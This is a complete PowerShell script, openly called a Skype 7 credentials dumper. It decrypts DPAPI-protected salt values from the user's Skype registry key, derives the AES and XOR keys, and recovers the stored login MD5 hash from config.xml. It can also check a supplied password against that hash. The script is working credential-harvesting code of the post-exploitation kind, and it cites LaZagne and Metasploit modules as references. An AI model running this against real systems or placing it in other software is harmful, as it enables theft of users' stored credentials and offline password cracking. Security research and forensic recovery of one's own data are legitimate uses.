<#
.Synopsis
    Skype 7 credentials dumper.

.Description
    Dump Skype 7 login MD5 hash from stored credentials in config.xml
    Optionally validate user supplied login/password against stored hash

    The hash is in MD5 format that uses the username,
    a static string "\nskyper\n" and the  password.
    The resulting MD5 is stored in the Config.xml file
    for the user after being XOR'd against a key
    generated by applying 2 SHA1 hashes of "salt" data
    which is stored in ProtectedStorage using
    the Windows API CryptProtectData against the MD5

.Parameter Path

    Path to config.xml. Default is current deirectory.

.Parameter Login

    Skype login, used to calculate and match MD5 hash

.Parameter Password

    Skype password, used to calculate and match MD5 hash

.Example

    .\Get-SkypeCredentials.ps1

    Get login hash from config.xml in current directory

.Example

    .\Get-SkypeCredentials.ps1 -Path "$env:APPDATA\Skype\mylogin\config.xml"

    Get login hash from config.xml in Skype 7 profile

.Example

    .\Get-SkypeCredentials.ps1 -Path "$env:APPDATA\Skype\mylogin\config.xml" -Login 'mylogin' -Password 'mypassword'

    Get login hash from config.xml in Skype 7 profile, validate user credentails against it.

.Notes

    - http://insecurety.net/password-algorithms-skype-windows/

    - https://github.com/AlessandroZ/LaZagne/blob/master/Windows/lazagne/softwares/chats/skype.py
    - https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/skype.rb
    - https://github.com/mehulj94/Radium-Keylogger/blob/master/Recoveries/skype.py

    - https://github.com/msndevs/skylogin
    - https://github.com/uunicorn/pyskype
    - https://github.com/mart-e/epycs

    - https://packetstormsecurity.com/files/119155/Skype-Hash-Dumper-1.0.html

    - http://runtux.com/files/download/skype.4.pdf
    - http://www.secdev.org/conf/skype_BHEU06.handout.pdf
    - http://www.recon.cx/en/f/vskype-part1.pdf
    - http://www.recon.cx/en/f/vskype-part2.pdf

#>

[CmdletBinding(DefaultParameterSetName = '__AllParameterSets')]
Param(
    [Parameter(
        Position = 0,
        ValueFromPipeline = $true
    )]
    [ValidateNotNullOrEmpty()]
    [string]$Path = 'config.xml',

    [Parameter(
        Position = 1,
        Mandatory = $true,
        ParameterSetName = 'Validate'
    )]
    [ValidateNotNullOrEmpty()]
    [string]$Login,

    [Parameter(
        Position = 2,
        Mandatory = $true,
        ParameterSetName = 'Validate'
    )]
    [ValidateNotNullOrEmpty()]
    [string]$Password
)

filter Remove-Object {
    if ($_.GetType().GetMethod('Dispose')) {
        $_.Dispose()
    }
}

function Get-SkypeCredentials {
    [CmdletBinding()]
    Param(
        [Parameter(
            Position = 0,
            Mandatory = $true,
            ValueFromPipeline = $true
        )]
        [ValidateScript( {
            Test-Path -LiteralPath $_ -PathType Leaf
        })]
        [ValidateNotNullOrEmpty()]
        [string]$Path
    )

    process {
        if ([xml]$Cfg = Get-Content -LiteralPath $Path) {
            if ($Cfg.config.Lib.Account.Credentials3) {
                $Cfg.config.Lib.Account.Credentials3
            }
            else {
                throw "Credentials not found in: $Path"
            }
        }
    }
}

function Get-SkypeSalt {
    [CmdletBinding()]
    Param()

    $SkypeRegPath = 'HKEY_CURRENT_USER\Software\Skype\ProtectedStorage'

    $Items = Get-ItemProperty -Path "Registry::$SkypeRegPath" -ErrorAction Stop

    $Values = New-Object -TypeName System.Collections.Generic.List[byte[]]

    @($Items.PSObject.Properties | Select-Object -ExpandProperty Name) -notlike 'PS*' |
    ForEach-Object {
        $Values.Add(
            [System.Security.Cryptography.ProtectedData]::Unprotect(
                $Items.$_,
                $null,
                [System.Security.Cryptography.DataProtectionScope]::CurrentUser
            )
        )
    }

    ,$Values
}

function Get-MD5Hash {
    [CmdletBinding()]
    Param(
        [Parameter(
            Position = 0,
            Mandatory = $true,
            ValueFromPipeline = $true
        )]
        [ValidateNotNullOrEmpty()]
        [string]$InputObject,

        [System.Text.Encoding]$Encoding = [System.Text.Encoding]::ASCII
    )

    process {
        $MD5 = New-Object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
        $MD5.ComputeHash(
            $Encoding.GetBytes($InputObject)
        )

        $MD5 | Remove-Object
    }
}

function ConvertTo-HexString {
    [CmdletBinding()]
    Param (
        [Parameter(
            Position = 0,
            Mandatory = $true,
            ValueFromPipeline = $true
        )]
        [byte[]]$InputObject
    )

    begin {
        $Values = New-Object -TypeName System.Collections.Generic.List[string]
    }

    process {
        $Values.AddRange(
            [string[]](
                $(
                    foreach ($item in $InputObject) {
                        '{0:x2}' -f [int]$item
                    }
                )
            )
        )
    }

    end {
        $Values -join ' '
    }
}

function ConvertFrom-Hex {
    [CmdletBinding()]
    Param (
        [Parameter(
            Position = 0,
            Mandatory = $true,
            ValueFromPipeline = $true
        )]
        [string]$InputObject
    )

    process {
        $Bytes = [byte[]](@($null) * ($InputObject.Length / 2))

        for ($i = 0 ; $i -lt $InputObject.Length ; $i += 2) {
            $Bytes[$i / 2] = [System.Convert]::ToByte($InputObject.Substring($i, 2), 16)
        }

        $Bytes
    }
}

function Get-SkypeAesKey {
    [CmdletBinding()]
    Param(
        [Parameter(
            Position = 0,
            Mandatory = $true
        )]
        [ValidateNotNullOrEmpty()]
        [byte[]]$Salt
    )

    $SHACSP = New-Object -Typename System.Security.Cryptography.SHA1CryptoServiceProvider

    # Concatinate SHA digests for AES key
    $AesKey = $SHACSP.ComputeHash(
        @(0, 0, 0, 0) + $Salt
    ) + $SHACSP.ComputeHash(
        @(0, 0, 0, 1) + $Salt
    )

    # Use only 32 bytes of key
    $AesKey[0..31]

    $SHACSP | Remove-Object
}

function Get-SkypeXorKey {
    [CmdletBinding()]
    Param(
        [Parameter(
            Position = 0,
            Mandatory = $true
        )]
        [ValidateNotNullOrEmpty()]
        [byte[]]$AesKey
    )

    $AES = New-Object -TypeName System.Security.Cryptography.AesManaged

    # https://crypto.stackexchange.com/questions/10522/openssl-padding
    $AES.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7

    $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
    $AES.BlockSize = 128
    $AES.KeySize = 256

    $DummyBytes = @(0) * 16
    $AesIV = $DummyBytes

    $Encryptor = $AES.CreateEncryptor($AesKey, $AesIV)

    $XorKey = $Encryptor.TransformFinalBlock($DummyBytes, 0, $DummyBytes.Length)

    # Use only 16 bytes of key
    $XorKey[0..15]

    $AES | Remove-Object
}

function Get-SkypeLoginMD5 {
    [CmdletBinding()]
    Param(
        [Parameter(
            Position = 0,
            Mandatory = $true
        )]
        [ValidateNotNullOrEmpty()]
        [byte[]]$Cred,

        [Parameter(
            Position = 0,
            Mandatory = $true
        )]
        [ValidateNotNullOrEmpty()]
        [byte[]]$XorKey
    )

    for ($i = 0 ; $i -lt 16 ; $i++) {
        $Cred[$i] -bxor $XorKey[$i]
    }
}

Add-Type -AssemblyName System.Security -ErrorAction Stop

$Cred = Get-SkypeCredentials -Path $Path | ConvertFrom-Hex


$Salt = (Get-SkypeSalt)[0] # I have two itemes in Skype registry: 0 and 1
Write-Host "Salt`t`t: " -ForegroundColor Green -NoNewline
$Salt | ConvertTo-HexString | Write-Host


$AesKey = Get-SkypeAesKey -Salt $Salt
Write-Host "AES key`t`t: " -ForegroundColor Green -NoNewline
$AesKey | ConvertTo-HexString | Write-Host


$XorKey = Get-SkypeXorKey -AesKey $AesKey
Write-Host "XOR key`t`t: " -ForegroundColor Green -NoNewline
$XorKey | ConvertTo-HexString | Write-Host


$LoginHashMD5 = Get-SkypeLoginMD5 -Cred $Cred -XorKey $XorKey
Write-Host "Login MD5`t: " -ForegroundColor Cyan -NoNewline
$LoginHashMD5 | ConvertTo-HexString | Write-Host -ForegroundColor Yellow


if ($PSCmdlet.ParameterSetName -eq 'Validate') {
    $ValidateString = "$Login`nskyper`n$Password"
    $ValidateStringMD5 = $ValidateString | Get-MD5Hash
    Write-Host "Your  MD5`t: " -ForegroundColor Cyan -NoNewline
    $ValidateStringMD5 | ConvertTo-HexString | Write-Host -ForegroundColor Magenta

    if (Compare-Object -ReferenceObject $LoginHashMD5 -DifferenceObject $ValidateStringMD5 -SyncWindow 0) {
        Write-Host "`n> Hashes don't match!`n" -ForegroundColor Red
    } else {
        Write-Host "`n> Hashes match!`n" -ForegroundColor Green
    }
}
